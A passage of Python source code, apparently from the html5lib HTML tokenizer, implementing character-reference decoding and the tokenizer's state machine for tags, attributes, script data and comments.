present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked. """ allowed = digits radix = 10 if isHex: allowed = hexDigits radix = 16 charStack = [] # Consume all the characters that are in range while making sure we # don't hit an EOF. c = self.stream.char() while c in allowed and c is not EOF: charStack.append(c) c = self.stream.char() # Convert the set of characters consumed to an int. charAsInt = int("".join(charStack), radix) # Certain characters get replaced with others if charAsInt in replacementCharacters: char = replacementCharacters[charAsInt] self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) elif ((0xD800 <= charAsInt <= 0xDFFF) or (charAsInt > 0x10FFFF)): char = "\uFFFD" self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) else: # Should speed up this check somehow (e.g. 
move the set to a constant) if ((0x0001 <= charAsInt <= 0x0008) or (0x000E <= charAsInt <= 0x001F) or (0x007F <= charAsInt <= 0x009F) or (0xFDD0 <= charAsInt <= 0xFDEF) or charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE, 0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE, 0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF, 0x10FFFE, 0x10FFFF])): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) try: # Try/except needed as UCS-2 Python builds' unichar only works # within the BMP. char = chr(charAsInt) except ValueError: v = charAsInt - 0x10000 char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF)) # Discard the ; if present. Otherwise, put it back on the queue and # invoke parseError on parser. if c != ";": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "numeric-entity-without-semicolon"}) self.stream.unget(c) return char def consumeEntity(self, allowedChar=None, fromAttribute=False): # Initialise to the default output for when no entity is matched output = "&" charStack = [self.stream.char()] if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&") or (allowedChar is not None and allowedChar == charStack[0])): self.stream.unget(charStack[0]) elif charStack[0] == "#": # Read the next character to see if it's hex or decimal hex = False charStack.append(self.stream.char()) if charStack[-1] in ("x", "X"): hex = True charStack.append(self.stream.char()) # charStack[-1] should be the first digit if (hex and charStack[-1] in hexDigits) \ or (not hex and charStack[-1] in digits): # At least one digit found, so consume the whole number self.stream.unget(charStack[-1]) output = self.consumeNumberEntity(hex) else: # No digits found self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-numeric-entity"}) self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) else: # At this point in the process might have named entity. Entities # are stored in the global variable "entities". # # Consume characters and compare to these to a substring of the # entity names in the list until the substring no longer matches. while (charStack[-1] is not EOF): if not entitiesTrie.has_keys_with_prefix("".join(charStack)): break charStack.append(self.stream.char()) # At this point we have a string that starts with some characters # that may match an entity # Try to find the longest entity the string will match to take care # of &noti for instance. 
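            # (Editor's note, added for clarity: with the spec's "&notit;"
            # example the loop above stops once "notit" no longer prefixes any
            # entity name, longest_prefix("noti") below then picks the "not"
            # entity, and the trailing "it;" comes through as plain text.)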
try: entityName = entitiesTrie.longest_prefix("".join(charStack[:-1])) entityLength = len(entityName) except KeyError: entityName = None if entityName is not None: if entityName[-1] != ";": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "named-entity-without-semicolon"}) if (entityName[-1] != ";" and fromAttribute and (charStack[entityLength] in asciiLetters or charStack[entityLength] in digits or charStack[entityLength] == "=")): self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) else: output = entities[entityName] self.stream.unget(charStack.pop()) output += "".join(charStack[entityLength:]) else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-named-entity"}) self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) if fromAttribute: self.currentToken["data"][-1][1] += output else: if output in spaceCharacters: tokenType = "SpaceCharacters" else: tokenType = "Characters" self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output}) def processEntityInAttribute(self, allowedChar): """This method replaces the need for "entityInAttributeValueState". """ self.consumeEntity(allowedChar=allowedChar, fromAttribute=True) def emitCurrentToken(self): """This method is a generic handler for emitting the tags. It also sets the state to "data" because that's what's needed after a token has been emitted. """ token = self.currentToken # Add token to the queue to be yielded if (token["type"] in tagTokenTypes): if self.lowercaseElementName: token["name"] = token["name"].translate(asciiUpper2Lower) if token["type"] == tokenTypes["EndTag"]: if token["data"]: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "attributes-in-end-tag"}) if token["selfClosing"]: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "self-closing-flag-on-end-tag"}) self.tokenQueue.append(token) self.state = self.dataState # Below are the various tokenizer states worked out. def dataState(self): data = self.stream.char() if data == "&": self.state = self.entityDataState elif data == "<": self.state = self.tagOpenState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\u0000"}) elif data is EOF: # Tokenization ends. return False elif data in spaceCharacters: # Directly after emitting a token you switch back to the "data # state". At that point spaceCharacters are important so they are # emitted separately. self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data": data + self.stream.charsUntil(spaceCharacters, True)}) # No need to update lastFourChars here, since the first space will # have already been appended to lastFourChars and will have broken # any <!-- or --> sequences else: chars = self.stream.charsUntil(("&", "<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def entityDataState(self): self.consumeEntity() self.state = self.dataState return True def rcdataState(self): data = self.stream.char() if data == "&": self.state = self.characterReferenceInRcdata elif data == "<": self.state = self.rcdataLessThanSignState elif data == EOF: # Tokenization ends. 
return False elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data in spaceCharacters: # Directly after emitting a token you switch back to the "data # state". At that point spaceCharacters are important so they are # emitted separately. self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data": data + self.stream.charsUntil(spaceCharacters, True)}) # No need to update lastFourChars here, since the first space will # have already been appended to lastFourChars and will have broken # any <!-- or --> sequences else: chars = self.stream.charsUntil(("&", "<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def characterReferenceInRcdata(self): self.consumeEntity() self.state = self.rcdataState return True def rawtextState(self): data = self.stream.char() if data == "<": self.state = self.rawtextLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: # Tokenization ends. return False else: chars = self.stream.charsUntil(("<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def scriptDataState(self): data = self.stream.char() if data == "<": self.state = self.scriptDataLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: # Tokenization ends. return False else: chars = self.stream.charsUntil(("<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def plaintextState(self): data = self.stream.char() if data == EOF: # Tokenization ends. return False elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + self.stream.charsUntil("\u0000")}) return True def tagOpenState(self): data = self.stream.char() if data == "!": self.state = self.markupDeclarationOpenState elif data == "/": self.state = self.closeTagOpenState elif data in asciiLetters: self.currentToken = {"type": tokenTypes["StartTag"], "name": data, "data": [], "selfClosing": False, "selfClosingAcknowledged": False} self.state = self.tagNameState elif data == ">": # XXX In theory it could be something besides a tag name. But # do we really care? self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name-but-got-right-bracket"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"}) self.state = self.dataState elif data == "?": # XXX In theory it could be something besides a tag name. But # do we really care? 
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name-but-got-question-mark"}) self.stream.unget(data) self.state = self.bogusCommentState else: # XXX self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.dataState return True def closeTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.currentToken = {"type": tokenTypes["EndTag"], "name": data, "data": [], "selfClosing": False} self.state = self.tagNameState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-right-bracket"}) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-eof"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.state = self.dataState else: # XXX data can be _'_... self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-char", "datavars": {"data": data}}) self.stream.unget(data) self.state = self.bogusCommentState return True def tagNameState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == ">": self.emitCurrentToken() elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-tag-name"}) self.state = self.dataState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] += "\uFFFD" else: self.currentToken["name"] += data # (Don't use charsUntil here, because tag names are # very short and it's faster to not do anything fancy) return True def rcdataLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.rcdataEndTagOpenState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.rcdataState return True def rcdataEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.rcdataEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.rcdataState return True def rcdataEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.rcdataState return True def rawtextLessThanSignState(self): data = self.stream.char() if data == "/": 
self.temporaryBuffer = "" self.state = self.rawtextEndTagOpenState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.rawtextState return True def rawtextEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.rawtextEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.rawtextState return True def rawtextEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.rawtextState return True def scriptDataLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.scriptDataEndTagOpenState elif data == "!": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"}) self.state = self.scriptDataEscapeStartState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.scriptDataEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapeStartState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapeStartDashState else: self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapeStartDashState(self): data = 
self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashDashState else: self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapedState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashState elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: self.state = self.dataState else: chars = self.stream.charsUntil(("<", "-", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def scriptDataEscapedDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashDashState elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataEscapedState elif data == EOF: self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataEscapedState return True def scriptDataEscapedDashDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == ">": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"}) self.state = self.scriptDataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataEscapedState elif data == EOF: self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataEscapedState return True def scriptDataEscapedLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.scriptDataEscapedEndTagOpenState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data}) self.temporaryBuffer = data self.state = self.scriptDataDoubleEscapeStartState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataEscapedEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer = data self.state = self.scriptDataEscapedEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataEscapedEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and 
appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataDoubleEscapeStartState(self): data = self.stream.char() if data in (spaceCharacters | frozenset(("/", ">"))): self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) if self.temporaryBuffer.lower() == "script": self.state = self.scriptDataDoubleEscapedState else: self.state = self.scriptDataEscapedState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.temporaryBuffer += data else: self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataDoubleEscapedState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataDoubleEscapedDashState elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) return True def scriptDataDoubleEscapedDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataDoubleEscapedDashDashState elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataDoubleEscapedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapedDashDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == ">": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"}) self.state = self.scriptDataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataDoubleEscapedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], 
"data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapedLessThanSignState(self): data = self.stream.char() if data == "/": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"}) self.temporaryBuffer = "" self.state = self.scriptDataDoubleEscapeEndState else: self.stream.unget(data) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapeEndState(self): data = self.stream.char() if data in (spaceCharacters | frozenset(("/", ">"))): self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) if self.temporaryBuffer.lower() == "script": self.state = self.scriptDataEscapedState else: self.state = self.scriptDataDoubleEscapedState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.temporaryBuffer += data else: self.stream.unget(data) self.state = self.scriptDataDoubleEscapedState return True def beforeAttributeNameState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data in asciiLetters: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == ">": self.emitCurrentToken() elif data == "/": self.state = self.selfClosingStartTagState elif data in ("'", '"', "=", "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-in-attribute-name"}) self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"].append(["\uFFFD", ""]) self.state = self.attributeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-name-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState return True def attributeNameState(self): data = self.stream.char() leavingThisState = True emitToken = False if data == "=": self.state = self.beforeAttributeValueState elif data in asciiLetters: self.currentToken["data"][-1][0] += data +\ self.stream.charsUntil(asciiLetters, True) leavingThisState = False elif data == ">": # XXX If we emit here the attributes are converted to a dict # without being checked and when the code below runs we error # because data is a dict not a list emitToken = True elif data in spaceCharacters: self.state = self.afterAttributeNameState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][0] += "\uFFFD" leavingThisState = False elif data in ("'", '"', "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-in-attribute-name"}) self.currentToken["data"][-1][0] += data leavingThisState = False elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-name"}) self.state = self.dataState else: self.currentToken["data"][-1][0] += data leavingThisState = False if leavingThisState: # Attributes are not dropped at this stage. That happens when the # start tag token is emitted so values can still be safely appended # to attributes, but we do want to report the parse error in time. 
if self.lowercaseAttrName: self.currentToken["data"][-1][0] = ( self.currentToken["data"][-1][0].translate(asciiUpper2Lower)) for name, value in self.currentToken["data"][:-1]: if self.currentToken["data"][-1][0] == name: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "duplicate-attribute"}) break # XXX Fix for above XXX if emitToken: self.emitCurrentToken() return True def afterAttributeNameState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data == "=": self.state = self.beforeAttributeValueState elif data == ">": self.emitCurrentToken() elif data in asciiLetters: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"].append(["\uFFFD", ""]) self.state = self.attributeNameState elif data in ("'", '"', "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-after-attribute-name"}) self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-end-of-tag-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState return True def beforeAttributeValueState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data == "\"": self.state = self.attributeValueDoubleQuotedState elif data == "&": self.state = self.attributeValueUnQuotedState self.stream.unget(data) elif data == "'": self.state = self.attributeValueSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-value-but-got-right-bracket"}) self.emitCurrentToken() elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" self.state = self.attributeValueUnQuotedState elif data in ("=", "<", "`"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "equals-in-unquoted-attribute-value"}) self.currentToken["data"][-1][1] += data self.state = self.attributeValueUnQuotedState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-value-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data self.state = self.attributeValueUnQuotedState return True def attributeValueDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterAttributeValueState elif data == "&": self.processEntityInAttribute('"') elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-double-quote"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data +\ self.stream.charsUntil(("\"", "&", "\u0000")) return True def attributeValueSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterAttributeValueState elif data == "&": self.processEntityInAttribute("'") elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": 
"invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-single-quote"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data +\ self.stream.charsUntil(("'", "&", "\u0000")) return True def attributeValueUnQuotedState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == "&": self.processEntityInAttribute(">") elif data == ">": self.emitCurrentToken() elif data in ('"', "'", "=", "<", "`"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-in-unquoted-attribute-value"}) self.currentToken["data"][-1][1] += data elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-no-quotes"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data + self.stream.charsUntil( frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters) return True def afterAttributeValueState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == ">": self.emitCurrentToken() elif data == "/": self.state = self.selfClosingStartTagState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-EOF-after-attribute-value"}) self.stream.unget(data) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-after-attribute-value"}) self.stream.unget(data) self.state = self.beforeAttributeNameState return True def selfClosingStartTagState(self): data = self.stream.char() if data == ">": self.currentToken["selfClosing"] = True self.emitCurrentToken() elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-EOF-after-solidus-in-tag"}) self.stream.unget(data) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-after-solidus-in-tag"}) self.stream.unget(data) self.state = self.beforeAttributeNameState return True def bogusCommentState(self): # Make a new comment token and give it as value all the characters # until the first > or EOF (charsUntil checks for EOF automatically) # and emit it. data = self.stream.charsUntil(">") data = data.replace("\u0000", "\uFFFD") self.tokenQueue.append( {"type": tokenTypes["Comment"], "data": data}) # Eat the character directly after the bogus comment which is either a # ">" or an EOF. 
self.stream.char() self.state = self.dataState return True def markupDeclarationOpenState(self): charStack = [self.stream.char()] if charStack[-1] == "-": charStack.append(self.stream.char()) if charStack[-1] == "-": self.currentToken = {"type": tokenTypes["Comment"], "data": ""} self.state = self.commentStartState return True elif charStack[-1] in ('d', 'D'): matched = True for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'), ('y', 'Y'), ('p', 'P'), ('e', 'E')): charStack.append(self.stream.char()) if charStack[-1] not in expected: matched = False break if matched: self.currentToken = {"type": tokenTypes["Doctype"], "name": "", "publicId": None, "systemId": None, "correct": True} self.state = self.doctypeState return True elif (charStack[-1] == "[" and self.parser is not None and self.parser.tree.openElements and self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace): matched = True for expected in ["C", "D", "A", "T", "A", "["]: charStack.append(self.stream.char()) if charStack[-1] != expected: matched = False break if matched: self.state = self.cdataSectionState return True self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-dashes-or-doctype"}) while charStack: self.stream.unget(charStack.pop()) 